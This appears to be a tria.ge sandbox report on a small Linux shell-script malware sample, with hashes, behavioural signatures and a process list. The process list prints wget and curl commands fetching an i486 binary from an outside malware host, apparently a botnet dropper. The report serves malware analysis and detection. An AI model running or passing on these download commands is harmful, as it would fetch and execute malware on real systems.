Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
2s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
15/07/2024, 14:32
Static task
static1
Behavioral task
behavioral1
Sample
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
-
Size
2KB
-
MD5
1ffa7d5e3a236cf0d6981d07e1b90406
-
SHA1
9bdae03e2410b108144841c466d1e769fea3a9ce
-
SHA256
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4
-
SHA512
6f2aea4615c2f2cf06fc7dd92d9dd24f8b79d3a89d9fb17a35dcd9170ed12f7b5c238ee64b99dfd19686cdccfca62580a4285cedbad11e4cc39315e0f8bba284
Malware Config
Signatures
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/filesystems cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/busybox cp
Processes
-
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh1⤵PID:645
-
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:647
-
-
/usr/bin/wgetwget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i4862⤵PID:649
-
-
/usr/bin/curlcurl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i4862⤵
- Checks CPU configuration
- Reads runtime system information
PID:658
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
507KB
MD5e588bcf03ae78237b58899d35f50c570
SHA12194732ebbefbc27bdae876c77f2a97a20175710
SHA2562dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555